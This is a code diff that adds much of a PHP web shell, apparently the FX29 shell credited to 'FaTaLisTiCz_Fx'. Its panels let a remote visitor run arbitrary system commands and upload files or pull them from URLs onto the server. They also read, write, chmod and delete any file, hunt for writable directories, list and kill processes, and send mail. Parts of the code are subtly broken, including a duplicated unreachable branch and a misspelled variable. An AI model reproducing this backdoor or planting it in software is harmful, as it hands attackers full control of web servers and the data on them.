+         ".: $sh_name Mailer :.</td></tr>".
+         "<tr><td>Your name:</td><td><input type=\"text\" name=\"sender_name\" value=\"".htmlspecialchars($sender_name)."\"></td</tr>".
+         "<tr><td>Your e-mail:</td><td><input type=\"text\" name=\"sender_email\" value=\"".htmlspecialchars($sender_email)."\"></td></tr>".
+         "<tr><td>To:</td><td><input type=\"text\" name=\"dest_email\" value=\"".htmlspecialchars($dest_email)."\"></td></tr>".
+         "<tr><td>Subject:</td><td><input size=70 type=\"text\" name=\"sender_subj\" value=\"".htmlspecialchars($sender_subj)."\"></td></tr>".
+         "<tr><td>Message:</td><td><textarea name=\"sender_body\" cols=80 rows=10>".htmlspecialchars($sender_body)."</textarea><br>".
+         "<tr><td></td><td><input type=\"submit\" name=\"submit\" value=\"Send\"></form></td></tr>".
+         "</table>\n";
+  }
+}
+if ($act == "search") {
+  echo "<div class=barheader>.: $sh_name File-System Search :.</div>";
+  if (empty($search_in)) {$search_in = $d;}
+  if (empty($search_name)) {$search_name = "(.*)"; $search_name_regexp = 1;}
+  if (empty($search_text_wwo)) {$search_text_regexp = 0;}
+  if (!empty($submit)) {
+    $found = array();
+    $found_d = 0;
+    $found_f = 0;
+    $search_i_f = 0;
+    $search_i_d = 0;
+    $a = array(
+        "name"=>$search_name,
+        "name_regexp"=>$search_name_regexp,
+        "text"=>$search_text,
+        "text_regexp"=>$search_text_regxp,
+        "text_wwo"=>$search_text_wwo,
+        "text_cs"=>$search_text_cs,
+        "text_not"=>$search_text_not
+    );
+    $searchtime = getmicrotime();
+    $in = array_unique(explode(";",$search_in));
+    foreach($in as $v) {fx29fsearch($v);}
+    $searchtime = round(getmicrotime()-$searchtime,4);
+    if (count($found) == 0) {echo "No files found!";}
+    else {
+      $ls_arr = $found;
+      $disp_fullpath = TRUE;
+      $act = "ls";
+    }
+  }
+  echo "<table class=contents>".
+       "<tr><td><form method=POST>".
+       "<input type=hidden name=\"d\" value=\"".$dispd."\"><input type=hidden name=act value=\"".$dspact."\">".
+       "File or folder Name:</td><td><input type=\"text\" name=\"search_name\" size=\"".round(strlen($search_name)+25)."\" value=\"".htmlspecialchars($search_name)."\">&nbsp;<input type=\"checkbox\" name=\"search_name_regexp\" value=\"1\" ".($search_name_regexp == 1?" checked":"")."> - Regular Expression</td></tr>".
+       "<tr><td>Look in (Separate by \";\"):</td><td><input type=\"text\" name=\"search_in\" size=\"".round(strlen($search_in)+25)."\" value=\"".htmlspecialchars($search_in)."\"></td></tr>".
+       "<tr><td>A word or phrase in the file:</td><td><textarea name=\"search_text\" cols=\"50\" rows=\"5\">".htmlspecialchars($search_text)."</textarea></td></tr>".
+       "<tr><td></td><td><input type=\"checkbox\" name=\"search_text_regexp\" value=\"1\" ".($search_text_regexp == 1?" checked":"")."> Regular Expression".
+       "  <input type=\"checkbox\" name=\"search_text_wwo\" value=\"1\" ".($search_text_wwo == 1?" checked":"")."> Whole words only".
+       "  <input type=\"checkbox\" name=\"search_text_cs\" value=\"1\" ".($search_text_cs == 1?" checked":"")."> Case sensitive".
+       "  <input type=\"checkbox\" name=\"search_text_not\" value=\"1\" ".($search_text_not == 1?" checked":"")."> Find files NOT containing the text</td></tr>".
+       "<tr><td></td><td><input type=submit name=submit value=\"Search\"></form></td></tr>".
+       "</table>\n";
+  if ($act == "ls") {
+    $dspact = $act;
+    echo $searchtime." secs (".$search_i_f." files and ".$search_i_d." folders, ".round(($search_i_f+$search_i_d)/$searchtime,4)." objects per second).</b>".
+         "<hr size=\"1\" noshade>";
+  }
+}
+if ($act == "chmod") {
+  $mode = fileperms($d.$f);
+  if (!$mode) {echo "<b>Change file-mode with error:</b> can't get current value.";}
+  else {
+    $form = TRUE;
+    if ($chmod_submit) {
+      $octet = "0".base_convert(($chmod_o["r"]?1:0).($chmod_o["w"]?1:0).($chmod_o["x"]?1:0).($chmod_g["r"]?1:0).($chmod_g["w"]?1:0).($chmod_g["x"]?1:0).($chmod_w["r"]?1:0).($chmod_w["w"]?1:0).($chmod_w["x"]?1:0),2,8);
+      if (chmod($d.$f,$octet)) { $act = "ls"; $form = FALSE; $err = ""; }
+      else {$err = "Can't chmod to ".$octet.".";}
+    }
+    if ($form) {
+      $perms = parse_perms($mode);
+      echo "<b>Changing file-mode (".$d.$f."), ".view_perms_color($d.$f)." (".substr(decoct(fileperms($d.$f)),-4,4).")</b><br>".($err?"<b>Error:</b> ".$err:"")."<form action=\"".$surl."\" method=POST><input type=hidden name=d value=\"".htmlspecialchars($d)."\"><input type=hidden name=f value=\"".htmlspecialchars($f)."\"><input type=hidden name=act value=chmod><table align=left width=300 border=0 cellspacing=0 cellpadding=5><tr><td><b>Owner</b><br><br><input type=checkbox NAME=chmod_o[r] value=1".($perms["o"]["r"]?" checked":"").">&nbsp;Read<br><input type=checkbox name=chmod_o[w] value=1".($perms["o"]["w"]?" checked":"").">&nbsp;Write<br><input type=checkbox NAME=chmod_o[x] value=1".($perms["o"]["x"]?" checked":"").">eXecute</td><td><b>Group</b><br><br><input type=checkbox NAME=chmod_g[r] value=1".($perms["g"]["r"]?" checked":"").">&nbsp;Read<br><input type=checkbox NAME=chmod_g[w] value=1".($perms["g"]["w"]?" checked":"").">&nbsp;Write<br><input type=checkbox NAME=chmod_g[x] value=1".($perms["g"]["x"]?" checked":"").">eXecute</font></td><td><b>World</b><br><br><input type=checkbox NAME=chmod_w[r] value=1".($perms["w"]["r"]?" checked":"").">&nbsp;Read<br><input type=checkbox NAME=chmod_w[w] value=1".($perms["w"]["w"]?" checked":"").">&nbsp;Write<br><input type=checkbox NAME=chmod_w[x] value=1".($perms["w"]["x"]?" checked":"").">eXecute</font></td></tr><tr><td><input type=submit name=chmod_submit value=\"Save\"></td></tr></table></form>";
+    }
+  }
+}
+if ($act == "upload") {
+  $uploadmess = "";
+  $uploadpath = str_replace("\\",DIRECTORY_SEPARATOR,$uploadpath);
+  if (empty($uploadpath)) {$uploadpath = $d;}
+  elseif (substr($uploadpath,-1) != DIRECTORY_SEPARATOR) {$uploadpath .= DIRECTORY_SEPARATOR;}
+  if (!empty($submit)) {
+    global $_FILES;
+    $uploadfile = $_FILES["uploadfile"];
+    if (!empty($uploadfile["tmp_name"])) {
+      if (empty($uploadfilename)) {$destin = $uploadfile["name"];}
+      else {$destin = $userfilename;}
+      if (!move_uploaded_file($uploadfile["tmp_name"],$uploadpath.$destin)) {
+        $uploadmess .= "Error uploading file ".$uploadfile["name"]." (can't copy \"".$uploadfile["tmp_name"]."\" to \"".$uploadpath.$destin."\"!<br>";
+      }
+      else { $uploadmess .= "File uploaded successfully!<br>".$uploadpath.$destin; }
+    }
+    else { echo "No file to upload!"; }
+  }
+  if ($miniform) {
+    echo "<b>".$uploadmess."</b>";
+    $act = "ls";
+  }
+  else {
+    echo "<table><tr><td colspan=2 class=barheader>".
+         ".: File Upload :.</td>".
+         "<td colspan=2>".$uploadmess."</td></tr>".
+         "<tr><td><form enctype=\"multipart/form-data\" action=\"".$surl."act=upload&d=".urlencode($d)."\" method=POST>".
+         "From Your Computer:</td><td><input name=\"uploadfile\" type=\"file\"></td></tr>".
+         "<tr><td>From URL:</td><td><input name=\"uploadurl\" type=\"text\" value=\"".htmlspecialchars($uploadurl)."\" size=\"70\"></td></tr>".
+         "<tr><td>Target Directory:</td><td><input name=\"uploadpath\" size=\"70\" value=\"".$dispd."\"></td></tr>".
+         "<tr><td>Target File Name:</td><td><input name=uploadfilename size=25></td></tr>".
+         "<tr><td></td><td><input type=checkbox name=uploadautoname value=1 id=df4> Convert file name to lowercase</td></tr>".
+         "<tr><td></td><td><input type=submit name=submit value=\"Upload\">".
+         "</form></td></tr></table>";
+  }
+}
+if ($act == "delete") {
+  $delerr = "";
+  foreach ($actbox as $v) {
+    $result = FALSE;
+    $result = fs_rmobj($v);
+    if (!$result) { $delerr .= "Can't delete ".htmlspecialchars($v)."<br>"; }
+  }
+  if (!empty($delerr)) { echo "<b>Error deleting:</b><br>".$delerr; }
+  $act = "ls";
+}
+if (!$usefsbuff) {
+  if (($act == "paste") or ($act == "copy") or ($act == "cut") or ($act == "unselect")) {
+    echo "<center><b>Sorry, buffer is disabled. For enable, set directive \"\$usefsbuff\" as TRUE.</center>";
+  }
+}
+else {
+  if ($act == "copy") {$err = ""; $sess_data["copy"] = array_merge($sess_data["copy"],$actbox); fx29_sess_put($sess_data); $act = "ls"; }
+  elseif ($act == "cut") {$sess_data["cut"] = array_merge($sess_data["cut"],$actbox); fx29_sess_put($sess_data); $act = "ls";}
+  elseif ($act == "unselect") {foreach ($sess_data["copy"] as $k=>$v) {if (in_array($v,$actbox)) {unset($sess_data["copy"][$k]);}} foreach ($sess_data["cut"] as $k=>$v) {if (in_array($v,$actbox)) {unset($sess_data["cut"][$k]);}} fx29_sess_put($sess_data); $act = "ls";}
+  if ($actemptybuff) {$sess_data["copy"] = $sess_data["cut"] = array(); fx29_sess_put($sess_data);}
+  elseif ($actpastebuff) {
+    $psterr = "";
+    foreach($sess_data["copy"] as $k=>$v) {
+      $to = $d.basename($v);
+      if (!fs_copy_obj($v,$to)) {$psterr .= "Can't copy ".$v." to ".$to."!<br>";}
+      if ($copy_unset) {unset($sess_data["copy"][$k]);}
+    }
+    foreach($sess_data["cut"] as $k=>$v) {
+      $to = $d.basename($v);
+      if (!fs_move_obj($v,$to)) {$psterr .= "Can't move ".$v." to ".$to."!<br>";}
+      unset($sess_data["cut"][$k]);
+    }
+    fx29_sess_put($sess_data);
+    if (!empty($psterr)) {echo "<b>Pasting with errors:</b><br>".$psterr;}
+    $act = "ls";
+  }
+  elseif ($actarcbuff) {
+    $arcerr = "";
+    if (substr($actarcbuff_path,-7,7) == ".tar.gz") {$ext = ".tar.gz";}
+    else {$ext = ".tar.gz";}
+    if ($ext == ".tar.gz") {$cmdline = "tar cfzv";}
+    $cmdline .= " ".$actarcbuff_path;
+    $objects = array_merge($sess_data["copy"],$sess_data["cut"]);
+    foreach($objects as $v) {
+      $v = str_replace("\\",DIRECTORY_SEPARATOR,$v);
+      if (substr($v,0,strlen($d)) == $d) {$v = basename($v);}
+      if (is_dir($v)) {
+        if (substr($v,-1) != DIRECTORY_SEPARATOR) {$v .= DIRECTORY_SEPARATOR;}
+        $v .= "*";
+      }
+      $cmdline .= " ".$v;
+    }
+    $tmp = realpath(".");
+    chdir($d);
+    $ret = fx29exec($cmdline);
+    chdir($tmp);
+    if (empty($ret)) {$arcerr .= "Can't call archivator (".htmlspecialchars(str2mini($cmdline,60)).")!<br>";}
+    $ret = str_replace("\r\n","\n",$ret);
+    $ret = explode("\n",$ret);
+    if ($copy_unset) {foreach($sess_data["copy"] as $k=>$v) {unset($sess_data["copy"][$k]);}}
+    foreach($sess_data["cut"] as $k=>$v) {
+      if (in_array($v,$ret)) {fs_rmobj($v);}
+      unset($sess_data["cut"][$k]);
+    }
+    fx29_sess_put($sess_data);
+    if (!empty($arcerr)) {echo "<b>Archivation errors:</b><br>".$arcerr;}
+    $act = "ls";
+  }
+  elseif ($actpastebuff) {
+    $psterr = "";
+    foreach($sess_data["copy"] as $k=>$v) {
+      $to = $d.basename($v);
+      if (!fs_copy_obj($v,$d)) {$psterr .= "Can't copy ".$v." to ".$to."!<br>";}
+      if ($copy_unset) {unset($sess_data["copy"][$k]);}
+    }
+    foreach($sess_data["cut"] as $k=>$v) {
+      $to = $d.basename($v);
+      if (!fs_move_obj($v,$d)) {$psterr .= "Can't move ".$v." to ".$to."!<br>";}
+      unset($sess_data["cut"][$k]);
+    }
+    fx29_sess_put($sess_data);
+    if (!empty($psterr)) {echo "<b>Error pasting:</b><br>".$psterr;}
+    $act = "ls";
+  }
+}
+if ($act == "cmd") {
+  @chdir($chdir);
+  if (!empty($submit)) {
+    echo "<div class=barheader>.: Results of Execution :.</div>\n";
+    $olddir = realpath(".");
+    @chdir($d);
+    $ret = fx29exec($cmd);
+    $ret = convert_cyr_string($ret,"d","w");
+    if ($cmd_txt) {
+      $rows = count(explode("\n",$ret))+1;
+      if ($rows < 10) { $rows = 10; } else { $rows = 30; }
+      $cols = 130;
+      echo "<textarea class=shell cols=\"$cols\" rows=\"$rows\" readonly>".htmlspecialchars($ret)."</textarea>\n";
+      //echo "<div align=left><pre>".htmlspecialchars($ret)."</pre></div>";
+    }
+    else { echo $ret."<br>"; }
+    @chdir($olddir);
+  }
+}
+if ($act == "ls") {
+  if (count($ls_arr) > 0) { $list = $ls_arr; }
+  else {
+    $list = array();
+    if ($h = @opendir($d)) {
+      while (($o = readdir($h)) !== FALSE) {$list[] = $d.$o;}
+      closedir($h);
+    }
+  }
+  if (count($list) == 0) { echo "<div class=fxerrmsg>Can't open folder (".htmlspecialchars($d).")!</div>";}
+  else {
+    $objects = array();
+    $vd = "f"; //Viewing mode
+    if ($vd == "f") {
+      $objects["head"] = array();
+      $objects["folders"] = array();
+      $objects["links"] = array();
+      $objects["files"] = array();
+      foreach ($list as $v) {
+        $o = basename($v);
+        $row = array();
+        if ($o == ".") {$row[] = $d.$o; $row[] = "CURDIR";}
+        elseif ($o == "..") {$row[] = $d.$o; $row[] = "UPDIR";}
+        elseif (is_dir($v)) {
+          if (is_link($v)) {$type = "LINK";}
+          else {$type = "DIR";}
+          $row[] = $v;
+          $row[] = $type;
+        }
+        elseif(is_file($v)) {$row[] = $v; $row[] = filesize($v);}
+        $row[] = filemtime($v);
+        if (!$win) {
+          $ow = posix_getpwuid(fileowner($v));
+          $gr = posix_getgrgid(filegroup($v));
+          $row[] = ($ow["name"]?$ow["name"]:fileowner($v))."/".($gr["name"]?$gr["name"]:filegroup($v));
+        }
+        $row[] = fileperms($v);
+        if (($o == ".") or ($o == "..")) {$objects["head"][] = $row;}
+        elseif (is_link($v)) {$objects["links"][] = $row;}
+        elseif (is_dir($v)) {$objects["folders"][] = $row;}
+        elseif (is_file($v)) {$objects["files"][] = $row;}
+        $i++;
+      }
+      $row = array();
+      $row[] = "<b>Name</b>";
+      $row[] = "<b>Size</b>";
+      $row[] = "<b>Date Modified</b>";
+      if (!$win) {$row[] = "<b>Owner/Group</b>";}
+      $row[] = "<b>Perms</b>";
+      $row[] = "<b>Action</b>";
+      $parsesort = parsesort($sort);
+      $sort = $parsesort[0].$parsesort[1];
+      $k = $parsesort[0];
+      if ($parsesort[1] != "a") {$parsesort[1] = "d";}
+      $y = " <a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&sort=".$k.($parsesort[1] == "a"?"d":"a")."\">";
+      $y .= "<img src=\"".$surl."act=img&img=sort_".($sort[1] == "a"?"asc":"desc")."\" height=\"9\" width=\"14\" alt=\"".($parsesort[1] == "a"?"Asc.":"Desc")."\" border=\"0\"></a>";
+      $row[$k] .= $y;
+      for($i=0;$i<count($row)-1;$i++) {
+        if ($i != $k) {$row[$i] = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&sort=".$i.$parsesort[1]."\">".$row[$i]."</a>";}
+      }
+      $v = $parsesort[0];
+      usort($objects["folders"], "tabsort");
+      usort($objects["links"], "tabsort");
+      usort($objects["files"], "tabsort");
+      if ($parsesort[1] == "d") {
+        $objects["folders"] = array_reverse($objects["folders"]);
+        $objects["files"] = array_reverse($objects["files"]);
+      }
+      $objects = array_merge($objects["head"],$objects["folders"],$objects["links"],$objects["files"]);
+      $tab = array();
+      $tab["cols"] = array($row);
+      $tab["head"] = array();
+      $tab["folders"] = array();
+      $tab["links"] = array();
+      $tab["files"] = array();
+      $i = 0;
+      foreach ($objects as $a) {
+        $v = $a[0];
+        $o = basename($v);
+        $dir = dirname($v);
+        if ($disp_fullpath) {$disppath = $v;}
+        else {$disppath = $o;}
+        $disppath = str2mini($disppath,60);
+        if (in_array($v,$sess_data["cut"])) {$disppath = "<strike>".$disppath."</strike>";}
+        elseif (in_array($v,$sess_data["copy"])) {$disppath = "<u>".$disppath."</u>";}
+        foreach ($regxp_highlight as $r) {
+          if (ereg($r[0],$o)) {
+            if ((!is_numeric($r[1])) or ($r[1] > 3)) {$r[1] = 0; ob_clean(); echo "Warning! Configuration error in \$regxp_highlight[".$k."][0] - unknown command."; fx29shexit();}
+            else {
+              $r[1] = round($r[1]);
+              $isdir = is_dir($v);
+              if (($r[1] == 0) or (($r[1] == 1) and !$isdir) or (($r[1] == 2) and !$isdir)) {
+                if (empty($r[2])) {$r[2] = "<b>"; $r[3] = "</b>";}
+                $disppath = $r[2].$disppath.$r[3];
+                if ($r[4]) {break;}
+              }
+            }
+          }
+        }
+        $uo = urlencode($o);
+        $ud = urlencode($dir);
+        $uv = urlencode($v);
+        $row = array();
+        if ($o == ".") {
+          $row[] = "<a href=\"".$surl."act=".$dspact."&d=".urlencode(realpath($d.$o))."&sort=".$sort."\"><img src=\"".$surl."act=img&img=small_dir\" border=\"0\">&nbsp;".$o."</a>";
+          $row[] = "CURDIR";
+        }
+        elseif ($o == "..") {
+          $row[] = "<a href=\"".$surl."act=".$dspact."&d=".urlencode(realpath($d.$o))."&sort=".$sort."\"><img src=\"".$surl."act=img&img=ext_lnk\" border=\"0\">&nbsp;".$o."</a>";
+          $row[] = "UPDIR";
+        }
+        elseif (is_dir($v)) {
+          if (is_link($v)) {
+            $disppath .= " => ".readlink($v);
+            $type = "LINK";
+            $row[] = "<a href=\"".$surl."act=ls&d=".$uv."&sort=".$sort."\"><img src=\"".$surl."act=img&img=ext_lnk\" border=\"0\">&nbsp;[".$disppath."]</a>";
+          }
+          else {
+            $type = "DIR";
+            $row[] =  "<a href=\"".$surl."act=ls&d=".$uv."&sort=".$sort."\"><img src=\"".$surl."act=img&img=small_dir\" border=\"0\">&nbsp;[".$disppath."]</a>";
+          }
+          $row[] = $type;
+        }
+        elseif(is_file($v)) {
+          $ext = explode(".",$o);
+          $c = count($ext)-1;
+          $ext = $ext[$c];
+          $ext = strtolower($ext);
+          $row[] =  "<a href=\"".$surl."act=f&f=".$uo."&d=".$ud."\"><img src=\"".$surl."act=img&img=ext_".$ext."\" border=\"0\">&nbsp;".$disppath."</a>";
+          $row[] = view_size($a[1]);
+        }
+        $row[] = @date("d.m.Y H:i:s",$a[2]);
+        if (!$win) { $row[] = $a[3]; }
+        $row[] = "<a href=\"".$surl."act=chmod&f=".$uo."&d=".$ud."\"><b>".view_perms_color($v)."</b></a>";
+        if ($o == ".") {$checkbox = "<input type=\"checkbox\" name=\"actbox[]\" onclick=\"ls_reverse_all();\">"; $i--;}
+        else {$checkbox = "<input type=\"checkbox\" name=\"actbox[]\" id=\"actbox".$i."\" value=\"".htmlspecialchars($v)."\">";}
+        if (is_dir($v)) {$row[] = "<a href=\"".$surl."act=d&d=".$uv."\"><img src=\"".$surl."act=img&img=ext_diz\" alt=\"Info\" border=\"0\"></a>&nbsp;".$checkbox;}
+        else {$row[] = "<a href=\"".$surl."act=f&f=".$uo."&ft=info&d=".$ud."\"><img src=\"".$surl."act=img&img=ext_diz\" alt=\"Info\" height=\"16\" width=\"16\" border=\"0\"></a>&nbsp;<a href=\"".$surl."act=f&f=".$uo."&ft=edit&d=".$ud."\"><img src=\"".$surl."act=img&img=change\" alt=\"Edit\" height=\"16\" width=\"19\" border=\"0\"></a>&nbsp;<a href=\"".$surl."act=f&f=".$uo."&ft=download&d=".$ud."\"><img src=\"".$surl."act=img&img=download\" alt=\"Download\" border=\"0\"></a>&nbsp;".$checkbox;}
+        if (($o == ".") or ($o == "..")) {$tab["head"][] = $row;}
+        elseif (is_link($v)) {$tab["links"][] = $row;}
+        elseif (is_dir($v)) {$tab["folders"][] = $row;}
+        elseif (is_file($v)) {$tab["files"][] = $row;}
+        $i++;
+      }
+    }
+    // Compiling table
+    $table = array_merge($tab["cols"],$tab["head"],$tab["folders"],$tab["links"],$tab["files"]);
+    echo "<div class=barheader>.: ";
+    if (!empty($fx_infohead)) { echo $fx_infohead; }
+    else { echo "Directory List (".count($tab["files"])." files and ".(count($tab["folders"])+count($tab["links"]))." folders)"; }
+    echo " :.</div>\n";
+    echo "<form action=\"".$surl."\" method=POST name=\"ls_form\"><input type=hidden name=act value=\"".$dspact."\"><input type=hidden name=d value=".$d.">".
+         "<table class=explorer>";
+    foreach($table as $row) {
+      echo "<tr>";
+      foreach($row as $v) {echo "<td>".$v."</td>";}
+      echo "</tr>\r\n";
+    }
+    echo "</table>".
+         "<script>".
+         "function ls_setcheckboxall(status) {".
+         " var id = 1; var num = ".(count($table)-2).";".
+         " while (id <= num) { document.getElementById('actbox'+id).checked = status; id++; }".
+         "}".
+         "function ls_reverse_all() {".
+         " var id = 1; var num = ".(count($table)-2).";".
+         " while (id <= num) { document.getElementById('actbox'+id).checked = !document.getElementById('actbox'+id).checked; id++; }".
+         "}".
+         "</script>".
+         "<div align=\"right\">".
+         "<input type=\"button\" onclick=\"ls_setcheckboxall(true);\" value=\"Select all\">&nbsp;&nbsp;<input type=\"button\" onclick=\"ls_setcheckboxall(false);\" value=\"Unselect all\">".
+         "<img src=\"".$surl."act=img&img=arrow_ltr\" border=\"0\">";
+    if (count(array_merge($sess_data["copy"],$sess_data["cut"])) > 0 and ($usefsbuff)) {
+      echo "<input type=submit name=actarcbuff value=\"Pack buffer to archive\">&nbsp;<input type=\"text\" name=\"actarcbuff_path\" value=\"fx_archive_".substr(md5(rand(1,1000).rand(1,1000)),0,5).".tar.gz\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<input type=submit name=\"actpastebuff\" value=\"Paste\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<input type=submit name=\"actemptybuff\" value=\"Empty buffer\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;";
+    }
+    echo "<select name=act><option value=\"".$act."\">With selected:</option>";
+    echo "<option value=delete".($dspact == "delete"?" selected":"").">Delete</option>";
+    echo "<option value=chmod".($dspact == "chmod"?" selected":"").">Change-mode</option>";
+    if ($usefsbuff) {
+      echo "<option value=cut".($dspact == "cut"?" selected":"").">Cut</option>";
+      echo "<option value=copy".($dspact == "copy"?" selected":"").">Copy</option>";
+      echo "<option value=unselect".($dspact == "unselect"?" selected":"").">Unselect</option>";
+    }
+    echo "</select>&nbsp;<input type=submit value=\"Confirm\"></div>";
+    echo "</form>";
+  }
+}
+if ($act == "tools") { tools(); }
+##[ PHP FILESYSTEM TRICKZ (By FaTaLisTiCz_Fx) ]##
+if ($act == "phpfsys") { 
+  echo "<div align=left>";
+  $fsfunc = $phpfsysfunc;
+  if ($fsfunc=="copy") {
+    if (!copy($arg1, $arg2)) { echo "Failed to copy $arg1...\n";}
+    else { echo "<b>Success!</b> $arg1 copied to $arg2\n"; }
+  }
+  elseif ($fsfunc=="rename") {
+    if (!rename($arg1, $arg2)) { echo "Failed to rename/move $arg1!\n";}
+    else { echo "<b>Success!</b> $arg1 renamed/moved to $arg2\n"; }
+  }
+  elseif ($fsfunc=="chmod") {
+    if (!chmod($arg1,$arg2)) { echo "Failed to chmod $arg1!\n";}
+    else { echo "<b>Perm for $arg1 changed to $arg2!</b>\n"; }
+  }
+  elseif ($fsfunc=="read") {
+    $darg = $d.$arg1;
+    if ($hasil = @file_get_contents($darg)) {
+      echo "<b>Filename:</b> ".$darg."<br>";
+      echo "<center><textarea cols=135 rows=30>";
+      echo htmlentities($hasil);
+      echo "</textarea></center>\n";
+    }
+    else { echo "<div class=fxerrmsg> Couldn't open ".$darg."<div>"; }
+  }
+  elseif ($fsfunc=="write") {
+    $darg = $d.$arg1;
+    if(@file_put_contents($darg,$arg2)) {
+      echo "<b>Saved!</b> ".$darg;
+    }
+    else { echo "<div class=fxerrmsg>Can't write to $darg!</div>"; }
+  }
+  elseif ($fsfunc=="downloadbin") {
+    $handle = fopen($arg1, "rb");
+    $contents = '';
+    while (!feof($handle)) {
+      $contents .= fread($handle, 8192);
+    }
+    $r = @fopen($d.$arg2,'w');
+    if (fwrite($r,$contents)) { echo "<b>Success!</b> $arg1 saved to ".$d.$arg2." (".view_size(filesize($d.$arg2)).")"; }
+    else { echo "<div class=fxerrmsg>Can't write to ".$d.$arg2."!</div>"; }
+    fclose($r);
+    fclose($handle);
+  }
+  elseif ($fsfunc=="download") {
+    $text = implode('', file($arg1));
+    if ($text) {
+      $r = @fopen($d.$arg2,'w');
+      if (fwrite($r,$text)) { echo "<b>Success!</b> $arg1 saved to ".$d.$arg2." (".view_size(filesize($d.$arg2)).")"; }
+      else { echo "<div class=fxerrmsg>Can't write to ".$d.$arg2."!</div>"; }
+      fclose($r);
+    }
+    else { echo "<div class=fxerrmsg>Can't download from $arg1!</div>";}
+  }
+  elseif ($fsfunc=='mkdir') {
+    $thedir = $d.$arg1;
+    if ($thedir != $d) {
+      if (file_exists($thedir)) { echo "<b>Already exists:</b> ".htmlspecialchars($thedir); }
+      elseif (!mkdir($thedir)) { echo "<b>Access denied:</b> ".htmlspecialchars($thedir); }
+      else { echo "<b>Dir created:</b> ".htmlspecialchars($thedir);}
+    }
+    else { echo "Can't create current dir:<b> $thedir</b>"; }
+  }
+  elseif ($fsfunc=='fwritabledir') {
+    function recurse_dir($dir,$max_dir) {
+      global $dir_count;
+      $dir_count++;
+      if( $cdir = dir($dir) ) {
+        while( $entry = $cdir-> read() ) {
+          if( $entry != '.' && $entry != '..' ) {
+            if(is_dir($dir.$entry) && is_writable($dir.$entry) ) {
+             if ($dir_count > $max_dir) { return; }
+              echo "[".$dir_count."] ".$dir.$entry."\n";
+              recurse_dir($dir.$entry.DIRECTORY_SEPARATOR,$max_dir);
+            }
+          }
+        }
+        $cdir->close();
+      }
+    }
+    if (!$arg1) { $arg1 = $d; }
+    if (!$arg2) { $arg2 = 10; }
+    if (is_dir($arg1)) {
+      echo "<b>Writable directories (Max: $arg2) in:</b> $arg1<hr noshade size=1>";
+      echo "<pre>";
+      recurse_dir($arg1,$arg2);
+      echo "</pre>";
+      $total = $dir_count - 1;
+      echo "<hr noshade size=1><b>Founds:</b> ".$total." of <b>Max</b> $arg2";
+    }
+    else {
+      echo "<div class=fxerrmsg>Directory is not exist or permission denied!</div>";
+    }
+  }
+  else {
+    if (!$arg1) { echo "<div class=fxerrmsg>No operation! Please fill parameter [A]!</div>\n"; }
+    else {
+      if ($hasil = $fsfunc($arg1)) {
+        echo "<b>Result of $fsfunc $arg1:</b><br>";
+        if (!is_array($hasil)) { echo "$hasil\n"; }
+        else {
+          echo "<pre>";
+          foreach ($hasil as $v) { echo $v."\n"; }
+          echo "</pre>";
+        }
+      }
+      else { echo "<div class=fxerrmsg>$fsfunc $arg1 failed!</div>\n"; }
+    }
+  }
+  echo "</div>\n";
+}
+if ($act == "processes") {
+  echo "<div class=barheader>.: Processes :.</div>\n";
+  if (!$win) { $handler = "ps aux".($grep?" | grep '".addslashes($grep)."'":""); }
+  else { $handler = "tasklist"; }
+  $ret = fx29exec($handler);
+  if (!$ret) { echo "Can't execute \"".$handler."\"!"; }
+  else {
+    if (empty($processes_sort)) { $processes_sort = $sort_default; }
+    $parsesort = parsesort($processes_sort);
+    if (!is_numeric($parsesort[0])) {$parsesort[0] = 0;}
+    $k = $parsesort[0];
+    if ($parsesort[1] != "a") {
+      $y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$k."a\"><img src=\"".$surl."act=img&img=sort_desc\" border=\"0\"></a>";
+    }
+    else {
+      $y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$k."d\"><img src=\"".$surl."act=img&img=sort_asc\" height=\"9\" width=\"14\" border=\"0\"></a>";
+    }
+    $ret = htmlspecialchars($ret);
+    if (!$win) { //Not Windows
+      if ($pid) {
+        if (is_null($sig)) { $sig = 9; }
+        echo "Sending signal ".$sig." to #".$pid."... ";
+        if (posix_kill($pid,$sig)) { echo "OK."; } else { echo "ERROR."; }
+      }
+      while (ereg("  ",$ret)) { $ret = str_replace("  "," ",$ret); }
+      $stack = explode("\n",$ret);
+      $head = explode(" ",$stack[0]);
+      unset($stack[0]);
+      for($i=0;$i<count($head);$i++) {
+        if ($i != $k) {
+          $head[$i] = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$i.$parsesort[1]."\"><b>".$head[$i]."</b></a>";
+        }
+      }
+      $head[$i] = "";
+      $prcs = array();
+      foreach ($stack as $line) {
+        if (!empty($line)) {
+          $line = explode(" ",$line);
+          $line[10] = join(" ",array_slice($line,10));
+          $line = array_slice($line,0,11);
+          if ($line[0] == get_current_user()) { $line[0] = "<font color=green>".$line[0]."</font>"; }
+          $line[] = "<a href=\"".$surl."act=processes&d=".urlencode($d)."&pid=".$line[1]."&sig=9\"><u>KILL</u></a>";
+          $prcs[] = $line;
+        }
+      }
+    }
+    //For Windows - Fixed By FaTaLisTiCz_Fx
+    else {
+      while (ereg("  ",$ret)) { $ret = str_replace("  "," ",$ret); }
+      while (ereg("=",$ret)) { $ret = str_replace("=","",$ret); }
+      $ret = convert_cyr_string($ret,"d","w");
+      $stack = explode("\n",$ret);
+      unset($stack[0],$stack[2]);
+      $stack = array_values($stack);
+      $stack[0]=str_replace("Image Name","ImageName",$stack[0]);
+      $stack[0]=str_replace("Session Name","SessionName",$stack[0]);
+      $stack[0]=str_replace("Mem Usage","MemoryUsage",$stack[0]);
+      $head = explode(" ",$stack[0]);
+      $stack = array_slice($stack,1);
+      $head = array_values($head);
+      if ($parsesort[1] != "a") { $y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$k."a\"><img src=\"".$surl."act=img&img=sort_desc\" border=\"0\"></a>"; }
+      else { $y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$k."d\"><img src=\"".$surl."act=img&img=sort_asc\" border=\"0\"></a>"; }
+      if ($k > count($head)) {$k = count($head)-1;}
+      for($i=0;$i<count($head);$i++) {
